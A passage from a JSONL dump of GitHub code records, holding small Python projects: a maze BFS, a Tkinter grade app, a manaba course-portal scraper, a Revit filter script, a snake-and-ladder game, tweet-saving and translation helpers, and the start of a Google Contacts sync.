out['event']['add_tags'].append(tag_id)\n\n yield out\n","repo_name":"theoccasionoctopus/theoccasionoctopus-bots-import","sub_path":"theoccasionoctopusbotsimport/spiders/coopsuk.py","file_name":"coopsuk.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35193789562","text":"# 古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?\n\"\"\"\n2,2,4,6,10,16,26...\n\"\"\"\n\n\n\ndef rabbits_sum(time):\n r_1 = 2\n r_2 = 2\n if time <= 2:\n return 2\n else:\n for i in range(time-3):\n r_1 += r_2\n r_2 += r_1\n if time % 2 == 0:\n return r_2\n else:\n return r_1\n\n\nif __name__ == '__main__':\n time = int(input(\"输入第几个月:\"))\n print(rabbits_sum(time))\n","repo_name":"MarshallMeng2079/100pythons","sub_path":"Python刷题/23-11.py","file_name":"23-11.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38779024256","text":"def bfs():\n que = []\n dr = (-1, 1, 0, 0)\n dc = (0, 0, -1, 1)\n # 1] 시작점을 큐에 저장 (방문표시)\n que.append((sr, sc, 0)) # 행, 열, 시간을 큐에 저장\n arr[sr][sc] = 1 # 맵에 방문표시\n while que:\n # 2] 큐에서 데이터 읽기\n r, c, time = que.pop(0)\n if r == er and c == ec: return time # 도착하면 리턴\n # 3] 델타검색하면서 연결점(길)을 찾아 큐에 저장\n for i in range(4):\n nr = r + dr[i]\n nc = c + dc[i]\n # 3-1] 맵의 범위 체크\n if nr < 0 or nr >= R or nc < 0 or nc >= C: continue\n # 3-2] 연결점을 찾아 큐에 저장(방문표시)\n if arr[nr][nc] != 0: continue # 길이 아니면 스킵\n arr[nr][nc] = 1\n que.append((nr, nc, time + 1))\n # 4] 큐가 빈 상태(예외상황)\n return -1\n\nC, R = map(int, input().split())\nsc, sr, ec, er = map(int, input().split())\nsc -= 1\nsr -= 1\nec -= 1\ner -= 1\narr = [list(map(int, input())) for i in range(R)]\nprint(bfs())\n\n#2번째 버전(혜리언니)\n\n# C, R = map(int, input().split())\n# c1, r1, c2, r2 = map(lambda x:int(x)-1, input().split())\n# arr = [list(map(int,input())) for _ in range(R)]\n# Q = [(r1, c1)]\n# dr = (1, -1, 0, 0)\n# dc = (0, 0, -1, 1)\n# while Q:\n# r, c = Q.pop(0)\n# for i in range(4):\n# newr, newc = r+dr[i], c+dc[i]\n# if 0<=newr<R and 0<=newc<C and not arr[newr][newc]:\n# Q.append((newr,newc))\n# arr[newr][newc] = arr[r][c] + 1\n# if arr[r2][c2]: break\n# print(arr[r2][c2])","repo_name":"woonji913/til","sub_path":"코테대비/20190327/미로탈출로봇.py","file_name":"미로탈출로봇.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20717428053","text":"import tkinter as tk \nimport sqlite3\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nconn = sqlite3.connect('data_siswa1.db')\ncursor = conn.cursor()\n\n# Membuat table jika belum ada\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS nilai_siswa (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nama_siswa TEXT,\n biologi INTEGER,\n fisika INTEGER,\n inggris INTEGER,\n prediksi_fakultas TEXT\n )\n''')\nconn.commit()\n\ndef submit_nilai():\n nama_siswa = Nama.get()\n nilai_biologi = int(Bio.get())\n nilai_fisika = int(Fis.get())\n nilai_inggris = int(Bing.get())\n\n # Menentukan prediksi fakultas\n prediksi = \"\"\n if nilai_biologi > nilai_fisika and nilai_biologi > nilai_inggris:\n prediksi = \"Kedokteran\"\n elif nilai_fisika > nilai_biologi and nilai_fisika > nilai_inggris:\n prediksi = \"Teknik\"\n elif nilai_inggris > nilai_biologi and nilai_inggris > nilai_fisika:\n prediksi = \"Bahasa\"\n \n # Memasukkan data ke SQLite\n cursor.execute('''\n INSERT INTO nilai_siswa (nama_siswa, biologi, fisika, inggris, prediksi_fakultas)\n VALUES (?, ?, ?, ?, ?)\n ''', (nama_siswa, nilai_biologi, nilai_fisika, nilai_inggris, prediksi))\n conn.commit()\n def klikButton():\n PrediksiFakultas = Pred\n messagebox.showinfo(\"Prediksi Fakultas\", \"Kamu masuk fakultas\" + prediksi)\n\nuiApp = tk.Tk()\nuiApp.configure(background='black') #Mengatur warna background\nuiApp.geometry(\"800x800\") #Besar ukuran\nuiApp.resizable(False,False) #disable pengubahan ukuran\nuiApp.title(\"Prediksi Fakultas\") #Memberi judul\n\ninputFrame = tk.Frame(uiApp) #Make canvas\ninputFrame.pack(padx=10, pady=10, fill=\"x\", expand=True) #Make canvas\n\ninputLabel = ttk.Label(inputFrame, text=\"Prediksi Fakultas\") #Make Label\ninputLabel.pack(padx=10, pady=10, fill=\"x\",expand=True) #Make Label\n\n#1\nNama = ttk.Label(inputFrame, text=\"Nama : \")\nNama.pack(padx=10, pady=5, fill=\"x\", expand=True)\nNama = ttk.Entry(inputFrame)\nNama.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#2\nBio = ttk.Label(inputFrame, text=\"Biologi : \")\nBio.pack(padx=10, pady=5, fill=\"x\", expand=True)\nBio = ttk.Entry(inputFrame)\nBio.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#3\nFis = ttk.Label(inputFrame, text=\"Fisika : \")\nFis.pack(padx=10, pady=5, fill=\"x\", expand=True)\nFis = ttk.Entry(inputFrame)\nFis.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#4\nBing = ttk.Label(inputFrame, text=\"Binggris : \")\nBing.pack(padx=10, pady=5, fill=\"x\", expand=True)\nBing = ttk.Entry(inputFrame)\nBing.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\nbuttonSubmit = ttk.Button (inputFrame, text=\"Prediksi Fakultas \", command= submit_nilai)\nbuttonSubmit.pack(padx=10, pady=10, fill=\"x\", expand=True)\n\nuiApp.mainloop() \n\nconn.close()","repo_name":"Kurwhy/pythonDB_040","sub_path":"Praktikum1.py","file_name":"Praktikum1.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4072197634","text":"# 3rd party\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\n\n# normal library\nimport time\nimport datetime\nimport sqlite3\nimport tkinter\nfrom tkinter import messagebox\n\n# my package\nfrom my_package.web.Web import Web\nfrom my_package.web.WebRegister import register_web\nfrom my_package.utils import url, scrape\n\n# スクレイピングするwebのdbが存在するかを確認、なければ作成、あればデータを返す\ndef get_web_data():\n conn = sqlite3.connect('my.db')\n c = conn.cursor()\n data = None\n try:\n c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n data = c.fetchone()\n if data is None:\n register_web(default_name='manaba', default_url='https://ct.ritsumei.ac.jp/ct/home')\n c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n data = c.fetchone()\n except:\n register_web(default_name='manaba', default_url='https://ct.ritsumei.ac.jp/ct/home')\n c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n data = c.fetchone()\n if data is None:\n c.execute(\"DELETE FROM webs WHERE name='manaba'\")\n conn.commit()\n conn.close()\n return None\n web = Web(data[0], data[1], data[2], data[3], data[4])\n conn.commit()\n conn.close()\n return web\n\n# manabaからレポート情報を取得\ndef manaba_scrape()-> list:\n # manabaログイン情報\n web = get_web_data()\n if web is None:\n return None\n\n # headlessモードで実行\n options = Options()\n options.add_argument('--headless')\n\n browser = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\n browser.implicitly_wait(10)\n\n if url.checkURL(web.get_pageData('url')):\n browser.get(web.get_pageData('url'))\n time.sleep(1)\n else:\n error_message('指定されたページが存在しません。')\n return None\n\n # ログイン\n form_dict = {'/html/body/div/div[2]/div[1]/form/p[1]/input':web.get_pageData('id'),\n '/html/body/div/div[2]/div[1]/form/p[2]/input':web.get_pageData('password')}\n scrape.input_element(browser, form_dict)\n time.sleep(1)\n scrape.button_click(browser, '/html/body/div/div[2]/div[1]/form/p[3]/input')\n time.sleep(3)\n\n # コース一覧へ遷移\n try:\n scrape.button_click(browser, '/html/body/div[2]/div[1]/div[5]/div[2]/a/img')\n time.sleep(1)\n except:\n error_message('manabaのログインに失敗しました。')\n browser.quit()\n return None\n\n # 受講科目の表示を曜日形式に変更\n scrape.button_click(browser, '/html/body/div[2]/div[2]/div/div[1]/div[2]/ul/li[3]/a')\n time.sleep(1)\n\n # 授業名取得\n html = browser.page_source.encode('utf-8')\n soup = BeautifulSoup(html, 'html.parser')\n my_courses = soup.find_all('td', attrs={'class':'course-cell'})\n my_class = []\n for course in my_courses:\n # 授業名\n course_name = course.find('a').text.split(' § ')\n name = []\n for cls_name in course_name:\n name.append(cls_name.split(':')[1])\n course_name = ' § '.join(name)\n # 課題\n homework = course.find('img', attrs={'src':'/icon-coursedeadline-on.png'})\n if homework is not None:\n my_class.append(f'{course_name}')\n else:\n my_class.append(None)\n time.sleep(1)\n \n # 課題\n report_and_difftime = []\n for inv,class_name in enumerate(my_class):\n # 未提出課題の有無を判定\n classworks = browser.find_elements_by_css_selector(\"div.courselistweekly-nonborder a\")\n class_elem = classworks[inv*2]\n if class_name is not None:\n # 個々の授業にアクセス\n browser.execute_script(\"arguments[0].click();\", class_elem)\n time.sleep(1)\n # レポート欄\n nonsubmit_report = browser.find_element_by_css_selector(\"div.course-menu-report span.my-unreadcount\")\n time.sleep(1)\n if nonsubmit_report is not None:\n course_report = browser.find_element_by_css_selector(\"a#coursereport\")\n browser.execute_script(\"arguments[0].click();\", course_report)\n time.sleep(1)\n report_icon = browser.find_elements_by_css_selector(\"img[src='/icon-deadline-on.png']\")\n reports = browser.find_elements_by_css_selector(\"h3.report-title a\")\n deadlines = browser.find_elements_by_css_selector(\"td.border.center\")\n time.sleep(1)\n for i in range(len(report_icon)):\n deadline = deadlines[i+3].text\n dt = datetime.datetime.strptime(deadline, \"%Y-%m-%d %H:%M\")\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n now = datetime.datetime.strptime(now, \"%Y-%m-%d %H:%M\")\n diff = dt - now\n report_info = (class_name,reports[i].text,diff)\n report_and_difftime.append(report_info)\n time.sleep(1)\n scrape.button_click(browser, '/html/body/div[2]/div[1]/div[5]/div[2]/a/img', 10)\n time.sleep(3)\n return report_and_difftime\n\ndef error_message(text:str):\n conn = sqlite3.connect('my.db')\n c = conn.cursor()\n c.execute(\"DELETE FROM webs WHERE name='manaba'\")\n conn.commit()\n conn.close()\n root = tkinter.Tk()\n root.withdraw()\n messagebox.showerror('エラー',text)\n time.sleep(5)\n root.destroy()\n\nif __name__=='__main__':\n a = manaba_scrape()\n print(a[0])","repo_name":"kensabrou/manaba-scrape","sub_path":"manaba.py","file_name":"manaba.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982609065","text":"# coding: utf8\nfrom System.Collections.Generic import List\n\nfrom Autodesk.Revit.DB import Document, FilterStringRule, ParameterValueProvider, FilteredElementCollector, \\\n BuiltInParameter, FilterStringBeginsWith, FilterRule, ParameterFilterElement, BuiltInCategory, Category, \\\n ElementId, FilterInverseRule, View3D, ViewDuplicateOption, FilterStringContains\nfrom Autodesk.Revit.DB.Mechanical import Duct\nfrom Autodesk.Revit.DB.Plumbing import Pipe\n\nimport rpw\n\ndoc = __revit__.ActiveUIDocument.Document # type: Document\n\n\n# valueProvider\ndef parameter_value_provider(base_class, built_in_parameter):\n # type: (type, str) -> ParameterValueProvider\n element = FilteredElementCollector(doc).OfClass(base_class).FirstElement()\n system_type_parameter_id = element.get_Parameter(built_in_parameter).Id\n return ParameterValueProvider(system_type_parameter_id)\n\n\n# Base view\ndef get_base_view(name):\n # type: (str) -> View3D\n for view in FilteredElementCollector(doc).OfClass(View3D):\n if view.Name == name:\n return view\n\n\ndef create_views(value_provider, built_in_category_list, prefix, num_range, num_format):\n # type: (ParameterValueProvider, iter, str, iter, str) -> None\n # evaluator\n # rule_evaluator = FilterStringBeginsWith()\n rule_evaluator = FilterStringContains()\n\n # caseSensitive\n case_sensitive = True\n\n # categories\n cat_ids = List[ElementId]()\n for cat in built_in_category_list:\n cat_id = Category.GetCategory(doc, eval(\"BuiltInCategory.{}\".format(cat))).Id\n cat_ids.Add(cat_id)\n\n base_view = get_base_view(\"3DControlBaseView\")\n\n with rpw.db.Transaction(\"Create 3D Control Views\"):\n for n in num_range:\n # ruleString\n filter_string = \"{prefix}{number:{num_format}}\".format(prefix=prefix, number=n, num_format=num_format)\n\n # rules\n filter_string_rule = FilterStringRule(value_provider, rule_evaluator, filter_string, case_sensitive)\n inverse_filter_rule = FilterInverseRule(filter_string_rule)\n rules = List[FilterRule]()\n rules.Add(inverse_filter_rule)\n\n # Create Filter\n filter_element = ParameterFilterElement.Create(doc, \"SAUF_{}\".format(filter_string), cat_ids, rules)\n\n # Add filter to view\n view = doc.GetElement(base_view.Duplicate(ViewDuplicateOption.Duplicate))\n view.Name = filter_string\n view.AddFilter(filter_element.Id)\n view.SetFilterVisibility(filter_element.Id, False)\n\n\ndef create_piping_views(prefix, num_range):\n # type: (str, iter) -> None\n value_provider = parameter_value_provider(Pipe, BuiltInParameter.RBS_PIPING_SYSTEM_TYPE_PARAM)\n bic_list = \"OST_PipeCurves\", \"OST_PipeFitting\", \"OST_PipeAccessory\", \"OST_PipeInsulations\"\n num_format = \"\"\n create_views(value_provider, bic_list, prefix, num_range, num_format)\n\n\ndef create_ventilation_views(prefix, num_range):\n # type: (str, iter) -> None\n value_provider = parameter_value_provider(Duct, BuiltInParameter.RBS_DUCT_SYSTEM_TYPE_PARAM)\n bic_list = \"OST_DuctCurves\", \"OST_DuctFitting\", \"OST_DuctAccessory\", \"OST_DuctTerminal\", \"OST_DuctInsulations\"\n num_format = \":02d\"\n create_views(value_provider, bic_list, prefix, num_range, num_format)\n\n\n# create_piping_views(\"HYD_SPE_247.\", range(1, 4))\n# create_ventilation_views(\"VEN_244.\", range(1, 67))\ncreate_piping_views(\"353.\", range(1, 7))\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Lab.panel/Lab.pulldown/3DControlView.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"71184274934","text":"import time\r\nimport random\r\nfrom os import system\r\nimport os\r\nimport copy\r\n\r\nclass snakeLadder():\r\n\r\n# ------------------------------------INITIALIZE BOARD AND PLAYERS----------------------------------------------\r\n def __init__(self):\r\n self.player_names=[]\r\n self.No_of_player=0\r\n self.player_pos={}\r\n\r\n title=\"SNAKE AND LADDER\"\r\n\r\n print(\"\\n\")\r\n for i in range(70):\r\n print(\" \"*i,end=\"\")\r\n print(\"/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/*~\",end=\"\")\r\n time.sleep(0.01)\r\n print(\"\\r\",end=\"\")\r\n\r\n print(\"\\n\\n\\n\")\r\n print(\"\\t\\t\\t\\t\\t\\t\\t\\t\\t\",end=\"\")\r\n for i in title:\r\n print(i,end=\"\",flush=True)\r\n time.sleep(0.05)\r\n\r\n input(\"\\n\\n\\t\\t\\t\\t\\t\\t\\t\\t READY TO PLAY PRESS ENTER!!!\")\r\n\r\n while self.No_of_player<2 or self.No_of_player>5:\r\n self.No_of_player=int(input(\"Enter Number of Players (max:5): \"))\r\n if(self.No_of_player>5 or self.No_of_player<2):\r\n print(\"---------------Please Enter value Between 2 to 5 ------------------\")\r\n\r\n for i in range(self.No_of_player):\r\n p_name=input(f\"Enter Player {i+1} Name: \")\r\n while p_name in self.player_names:\r\n print(\"Player Names Must Different!!!!\")\r\n p_name=input(f\"Enter Player {i+1} Name: \")\r\n self.player_names.append(p_name)\r\n\r\n for i in self.player_names:\r\n self.player_pos[i[0]+i[-1]]=0\r\n\r\n\r\n\r\n# -----------------------------Default Board---------------------------------------------\r\n def default_board(self):\r\n self.No_of_snakes=12\r\n self.No_of_ladder=8\r\n self.snake_position=[15,22,36,48,52,57,64,68,84,90,94,98]\r\n self.ladder_position=[8,19,23,35,40,52,73,77]\r\n\r\n\r\n\r\n# -----------------------------CUSTOMIZE BOARD--------------------------------------------\r\n def custom_board(self):\r\n self.No_of_snakes=0\r\n self.No_of_ladder=0\r\n self.ladder_position=[]\r\n self.snake_position=[]\r\n\r\n #---------------------------------Custom Snakes----------------------------------------\r\n\r\n while self.No_of_snakes<1 or self.No_of_snakes>20:\r\n self.No_of_snakes=int(input(\"Enter Number of Snakes you want: \"))\r\n if self.No_of_snakes<1 or self.No_of_snakes>20:\r\n print(\"---------------Please Enter value Between 1 to 20 ------------------\")\r\n \r\n for i in range(self.No_of_snakes):\r\n pos=int(input(f\"Enter Snake {i+1} Position: \"))\r\n while pos>99 or pos<10 or (pos in self.snake_position):\r\n print(\"---------------Please Enter value Between 10 to 99 and different One!!------------------\")\r\n pos=int(input(f\"Enter Snake {i+1} Position: \"))\r\n self.snake_position.append(pos)\r\n\r\n\r\n # -------------------------------Custom Ladders--------------------------------------\r\n\r\n while self.No_of_ladder<1 or self.No_of_ladder>20:\r\n self.No_of_ladder=int(input(\"Enter Number of Ladders You Want: \"))\r\n if self.No_of_ladder<1 or self.No_of_ladder>20:\r\n print(\"---------------Please Enter value Between 1 to 20 ------------------\")\r\n\r\n for i in range(self.No_of_ladder):\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n while pos_l>80 or pos_l<5 or (pos_l in self.ladder_position):\r\n print(\"---------------Please Enter value Between 5 to 80 and different One!!------------------\")\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n \r\n while pos_l in self.snake_position:\r\n print(\"Snake and Ladder Cannot Be On same Position!!!!!\")\r\n pos_l=int(input(f\"Enter Ladder {i+1} Position: \"))\r\n\r\n self.ladder_position.append(pos_l)\r\n\r\n\r\n\r\n\r\n# --------------------------------------Create Board--------------------------------------------\r\n\r\n\r\n def create_board(self):\r\n system(\"cls\")\r\n for i in range(10,0,-1):\r\n loc=0\r\n raw_line=[]\r\n for j in range(0,10):\r\n if(i%2==0):\r\n loc=(i*10)-j\r\n if loc in self.snake_position:\r\n print(f\"-{(i*10)-j}-$-{int(loc/2)}--\".center(13),end=\"\")\r\n elif loc in self.ladder_position:\r\n print(f\"-{(i*10)-j}-#-{loc+10}--\".center(13),end=\"\")\r\n else:\r\n print(f\"----{(i*10)-j}----\".center(13),end=\"\")\r\n raw_line.append(loc)\r\n \r\n else:\r\n loc=((i-1)*10)+j+1\r\n if loc in self.snake_position:\r\n print(f\"-{((i-1)*10)+j+1}-$-{int(loc/2)}--\".center(13),end=\"\")\r\n elif loc in self.ladder_position:\r\n print(f\"-{((i-1)*10)+j+1}-#-{loc+10}--\".center(13),end=\"\")\r\n else:\r\n print(f\"----{((i-1)*10)+j+1}----\".center(13),end=\"\")\r\n\r\n raw_line.append(loc)\r\n print(end=\"\\n\")\r\n\r\n for i in range(len(raw_line)):\r\n pla_combine=\"\"\r\n for k,v in self.player_pos.items():\r\n if raw_line[i]==v:\r\n pla_combine=pla_combine+\"^\"+k\r\n\r\n if pla_combine==\"\":\r\n print(\" \".center(13),end=\"\")\r\n else:\r\n print(f\"**[{pla_combine}]**\".center(13),end=\"\")\r\n \r\n print(\"\\n\")\r\n\r\n\r\n\r\n# -------------------------------------------ROLL DICE------------------------------------------------\r\n\r\n def roll_dice(self):\r\n input(\"!!!!! Press Enter To Roll Dice !!!!!\")\r\n \r\n dice_val=random.randint(1,6)\r\n if(dice_val==1):\r\n print((\" ________\\n| |\\n| * |\\n|________|\"))\r\n elif(dice_val==2):\r\n print((\" ________\\n| |\\n| * * |\\n|________|\"))\r\n elif(dice_val==3):\r\n print((\" ________\\n| |\\n| * * * |\\n|________|\"))\r\n elif(dice_val==4):\r\n print((\" ________\\n| * * |\\n| |\\n|__*__*__|\"))\r\n elif(dice_val==5):\r\n print((\" ________\\n| * * |\\n| * |\\n|__*__*__|\"))\r\n elif(dice_val==6):\r\n print((\" ________\\n| * * |\\n| * * |\\n|__*__*__|\"))\r\n return dice_val\r\n\r\n\r\n\r\n# -----------------------------------------------BOARD Refresh-------------------------------------------\r\n def refresh_board(self):\r\n input(\"\\nPress Enter To Move Pieces!!!\")\r\n self.create_board()\r\n \r\n\r\n\r\n# -----------------------------------------------Main Play Function--------------------------------------\r\n def play(self):\r\n ack=0\r\n turn_open_dict=copy.deepcopy(self.player_pos)\r\n while ack==0:\r\n for i in self.player_names:\r\n print(f\"{i}'s turn:\")\r\n num=self.roll_dice()\r\n if self.player_pos[i[0]+i[-1]]==0:\r\n if num==6:\r\n print(\"Wow Piece Opened!!!\")\r\n turn_open_dict[i[0]+i[-1]]=1\r\n else:\r\n print(\"\\nBring 6 to Open Piece!!!\")\r\n\r\n self.refresh_board()\r\n\r\n\r\n if turn_open_dict[i[0]+i[-1]]==1:\r\n test_pos=self.player_pos[i[0]+i[-1]]+num\r\n\r\n if test_pos>100:\r\n self.refresh_board()\r\n continue\r\n \r\n if test_pos==100:\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n self.refresh_board()\r\n print(f\"\\n\\n________________________________________________________________________________________________\")\r\n print(f\"_____________________________________Hurrey!!! {i} Wins_____________________________________\")\r\n input()\r\n os._exit(1)\r\n \r\n if test_pos in self.snake_position:\r\n print(\"\\nOhh No! You Got A Snake Bite!!! \")\r\n test_pos=int(test_pos/2)\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n elif test_pos in self.ladder_position:\r\n print(\"\\nNice! You Found A Ladder!!! \")\r\n test_pos=test_pos+10\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n else:\r\n self.player_pos[i[0]+i[-1]]=test_pos\r\n self.refresh_board()\r\n\r\n\r\n\r\n# ------------------------------------------Program Starts From Here----------------------------------------------------\r\n\r\n\r\nif __name__==\"__main__\":\r\n obj=snakeLadder()\r\n \r\n while True:\r\n ack=int(input((\"\\n\\nChoose:\\n1) Play Default Board \\n2) Customize Board \\n: \")))\r\n\r\n if(ack==1):\r\n obj.default_board()\r\n break\r\n elif(ack==2):\r\n obj.custom_board()\r\n break\r\n else:\r\n print(\"Please Choose Valid Option!!\")\r\n\r\n\r\n input((\"\\n\\n\\t\\t\\t\\t\\t\\t\\t\\t Let's Begin Press Enter!!!\"))\r\n\r\n obj.create_board()\r\n obj.play()","repo_name":"harshit13660/Learning_Files_Python","sub_path":"snakeLadder.py","file_name":"snakeLadder.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23589395793","text":"import math\nimport pandas as pd\nimport numpy as np\n\nfrom settings.dev import DATA_DIR, OUTPUT_DIR\n\n\ndef read_data(dataset: str, horizon: int = 24) -> (pd.DataFrame, np.ndarray):\n \"\"\"\n Reads data from the DATA_DIR and separates into target and features. Target\n is computed by selecting windspeed feature and selecting value of the\n same storm at a certain horizon ahead.\n Args:\n dataset (str): Name of the dataset in DATA_DIR\n horizon (int): Horizon for target (in hours)\n\n Returns:\n (pd.DataFrame, np.ndarray) : Tuple of features and target\n \"\"\"\n try:\n Data = pd.read_csv(DATA_DIR + dataset)\n except IOError:\n raise IOError(\"Data not found\")\n\n y = np.empty((len(Data)))\n y[:] = np.nan\n\n windowt = horizon / 6\n for i in range(len(Data)):\n if i + windowt >= len(Data):\n continue\n if Data['instant_t'][i + windowt] - Data['instant_t'][i] == windowt:\n y[i] = Data['windspeed'][i + windowt]\n X = Data\n i_toerase = []\n for i, yi in enumerate(y):\n if math.isnan(yi):\n i_toerase.append(i)\n X = X.drop(X.index[i_toerase])\n X.index = range(len(X))\n y = np.delete(y, i_toerase, axis=0)\n return X, y\n\n\ndef save_model(model, name: str = 'model') -> None:\n # unused\n \"\"\"\n Saves the keras model in .h5 format in OUTPUT_DIR.\n Args:\n name (str): Name of the output file\n\n Returns:\n None\n \"\"\"\n model.save(OUTPUT_DIR + '/{}.h5'.format(name))\n","repo_name":"fxferlande/storm_forecast","sub_path":"model/read_write.py","file_name":"read_write.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74998154613","text":"from datetime import date\nimport datetime\nfrom twintScripts import saveTweetsByHashtag, saveUserByName\n\n\ndef saveTweetsByHashtagList(hashtagList, startDate=datetime.datetime(2020, 10, 1), endDate=date.today(), username=None):\n for hashtag in hashtagList:\n print('\\033[96m' + \"saving tweets for hashtag: \" + hashtag + '\\033[0m')\n saveTweetsByHashtag(hashtag, startDate, endDate, username)\n\n\ndef saveUsers(usersList):\n for userName in usersList:\n try:\n saveUserByName(userName)\n except Exception as e:\n print(e)\n\n\ndef saveTweetsByHashtagListForAllUsers(hashtagList, userList, startDate=datetime.datetime(2020, 10, 1), endDate=date.today()):\n for hashtag in hashtagList:\n for user in userList:\n print('\\033[96m' + \"saving tweets for hashtag: \" + hashtag + \" for user: \" + user + '\\033[0m')\n saveTweetsByHashtag(hashtag, startDate, endDate, user)\n","repo_name":"alexmaar/political-analysis-backend","sub_path":"db/handle_tweets_module/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"315671897","text":"\"\"\"Perform translation.\"\"\"\n\nimport logging\n\nfrom api.version1_0.database import DbHelper\nfrom conf import settings\nfrom services.translate import translate\n\nlog = logging.getLogger()\n\n_TRANSLATED_TEXT = 'translatedText'\n_LANGUAGE = 'language'\n\n\ndef update_db_query(translation, detected_language, news_id):\n \"\"\"\n\n :param translation:\n :param detected_language:\n :param news_id:\n :return:\n \"\"\"\n if translation and detected_language and news_id:\n return u\"UPDATE news SET translated_content='%s', detected_language='%s' \" \\\n u\"WHERE news_id=%s;\" % (\n translation, detected_language, str(news_id))\n return\n\n\ndef translate_content(text, language=settings.TRANSLATION_DEFAULT_LANGUAGE):\n \"\"\"\n\n :param post_id:\n :param text:\n :param language:\n :return:\n \"\"\"\n if not text:\n raise ValueError('Invalid text')\n if not settings.TRANSLATION_SERVICE:\n log.info(\n 'Translation service is disabled in settings.translation_service')\n return settings.EMPTY_TEXT\n # Limited text (Limit requests to settings.TRANSLATION_LIMIT)\n limited_text = text[:settings.TRANSLATION_LIMIT]\n\n detected_language = translate.detect_language(limited_text)\n # Submit translation request.\n if detected_language.get('language') != language:\n logging.info(\n 'Translating from {} to {}'.format(\n detected_language.get('language'), language))\n translated_text = translate.translate_text(language, limited_text)\n if translated_text.get('translatedText'):\n return translated_text.get('translatedText')\n else:\n log.warning(\n 'No text to translate. Source language (%s) eq target language ('\n '%s)' % (detected_language.get('language'), language))\n return text\n\n\ndef translate_article(campaign_instance, article, new_article, news_id):\n \"\"\"\n\n :param campaign_instance:\n :param article:\n :param new_article:\n :param report:\n :param news_id:\n :return:\n \"\"\"\n # Perform translation using Google Translate API\n log.info('Translating...%r', article.url)\n translated_text = translate_content(\n article.title, campaign_instance.translation_lang)\n if new_article and translated_text:\n # Update database record\n sql_query = update_db_query(\n translated_text.replace(\"'\", \"''\"), settings.DEFAULT_LANGUAGE, news_id)\n DbHelper.update_database(sql_query)\n else:\n log.warning('Article already exists, skipping DB update')\n return translated_text\n","repo_name":"gogasca/news_ml","sub_path":"services/translate/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"24922979430","text":"import os\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google.oauth2 import service_account\nfrom schedule_tracker import updateScheduleTracker\nimport requests\n\ncreds = service_account.Credentials.from_service_account_info(\n\t\t{\n\t\t\t\"private_key\": os.environ.get('PRIVATE_KEY'),\n\t\t\t\"client_email\": os.environ.get('CLIENT_EMAIL'),\n\t\t\t\"token_uri\": \"https://oauth2.googleapis.com/token\",\n\t\t}, scopes=['https://www.googleapis.com/auth/contacts.readonly'], subject=os.environ.get('USER_EMAIL'))\n\nLUCOS_CONTACTS = os.environ.get('LUCOS_CONTACTS')\nif not LUCOS_CONTACTS:\n\texit(\"LUCOS_CONTACTS environment variable not set - needs to be the URL of a running lucos_contacts instance.\")\n\nLUCOS_HEADERS={'AUTHORIZATION':\"key \"+os.environ.get('LUCOS_CONTACTS_API_KEY')}\n\ntry:\n\tservice = build('people', 'v1', credentials=creds)\n\n\tsyncGroup = service.contactGroups().get(\n\t\tresourceName=os.environ.get('GROUP'),\n\t\tmaxMembers=1000,\n\t).execute()\n\tremainingResourceNames = syncGroup['memberResourceNames']\n\twhile len(remainingResourceNames) > 0:\n\t\tcontactsToUpdate = {}\n\n\t\t## Google's People API only supports 200 people at once, so split the group into chunks of 200\n\t\tnext200 = remainingResourceNames[:200]\n\t\tremainingResourceNames = remainingResourceNames[200:]\n\t\tpeople = service.people().getBatchGet(\n\t\t\tresourceNames=next200,\n\t\t\tpersonFields=\"names,emailAddresses,birthdays,phoneNumbers,photos,externalIds,metadata\"\n\t\t).execute()\n\t\tfor (resourceName, data) in 